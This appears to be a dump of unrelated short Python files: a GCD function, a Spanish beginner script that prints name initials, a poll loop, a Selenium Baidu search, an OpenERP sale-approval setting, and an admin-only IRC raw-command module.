    """Return the greatest common divisor of a and b.

    Iterative Euclid's algorithm. The result is always non-negative
    (the original recursive version could return a negative value when
    b < 0, e.g. gcd(12, -8) == -4), and gcd(0, 0) == 0.
    """
    # Normalize signs so the result is canonical regardless of input signs.
    a, b = abs(a), abs(b)
    # Loop instead of recursing: no exception-driven control flow and no
    # recursion-depth concerns for large inputs.
    while b:
        a, b = b, a % b
    return a
|
#Programa: nombre.py
#Propósito: Pedir el nombre y los dos apellidos de una persona y mostrar las iniciales.
#Autor: Jose Manuel Serrano Palomo.
#Fecha: 13/10/2019
#
#Variables a usar:
# nombre, apellido1, apellido2 estas seran las variables del nombre
# iniciales es la variable que contrendra las iniciales del nombre completo
#
#Algoritmo:
# LEER nombre, apellido1, apellido2
# iniciales <--- nombre[0] + apellido1[0] + apellido2[0]
# ESCRIBIR iniciales
print("Obtencion de iniciales de un nombre completo")
print("----------------------------------------------\n")
# Read the name and both surnames (user-facing prompts stay in Spanish).
nombre = str(input("Introduce tu nombre: "))
apellido1 = str(input("Introduce tu primer apellido: "))
apellido2 = str(input("Introduce tu segundo apellido: "))
# Build the initials from the first letter of each part, upper-cased.
iniciales = (nombre[0] + apellido1[0] + apellido2[0]).upper()
# Show the result.
print("Tus iniciales son: ", iniciales)
|
if __name__ == "__main__":
    # Poll responses collected so far, keyed by respondent name.
    favorite_languages = {
        'jen': 'python',
        'sarah': 'c',
        'edward': 'ruby',
        'phil': 'python'
    }
    # Everyone we want to hear from.
    persons = {
        'jen',
        'sarah',
        'bjorn',
        'benthe'
    }
    # Thank respondents who already answered; nudge the rest.
    for name in persons:
        suffix = (", Thanks for filling this enquete out!"
                  if name in favorite_languages
                  else ", You should really do this enquete!")
        print(name + suffix)
from selenium import webdriver
import os
# Drive a Chrome browser: open Baidu, type "python" into the search box
# and click the search button.
browser = webdriver.Chrome()
url = "http://www.baidu.com"
browser.get(url)
input= browser.find_element_by_id("kw")  # NOTE(review): shadows the builtin input()
input.send_keys("python")
browser.find_element_by_id("su").click()
# Close the browser
#browser.quit()
|
# -*- coding: utf-8 -*-
import logging
from openerp import pooler
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
from openerp.osv import osv, fields
from openerp import netsvc
class sale_configuration(osv.osv):
    # Extends the sale settings model with a configurable amount above which
    # a second approval of a sale is required.
    _inherit = 'sale.config.settings'
    def _select_value(self,cr,uid,ids, context=None):
        # Default for the limit: reuse the most recently saved value when it
        # is positive, otherwise fall back to 500000.
        cr.execute("""select limit_amount_double from sale_config_settings order by id desc""")
        valor = cr.fetchone()
        if valor and valor[0] != None and valor[0] > 0 :
            return valor[0]
        else:
            return 500000
    _columns = {
        'limit_amount_double': fields.integer('limite para requerir una segunda aprobación',required=True,
            help="Amount after which validation of sales is required."),
    }
    _defaults = {
        'limit_amount_double': _select_value
    }
|
from util.esc import unescape
class RawModule:
    """IRC bot module exposing an admin-only ``raw`` command."""

    require = "cmd"

    def __init__(self, circa):
        """Register the raw-command handler and its help text."""
        self.circa = circa
        self.events = {"cmd.raw": [self.raw]}
        self.docs = {"raw": "raw [msg] → send a raw IRC message. Admins only."}

    def raw(self, fr, to, msg, m):
        """Send *msg* verbatim to the server, but only when the sender is an admin."""
        if not self.circa.is_admin(m.prefix):
            return
        self.circa.send(unescape(msg))


module = RawModule
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.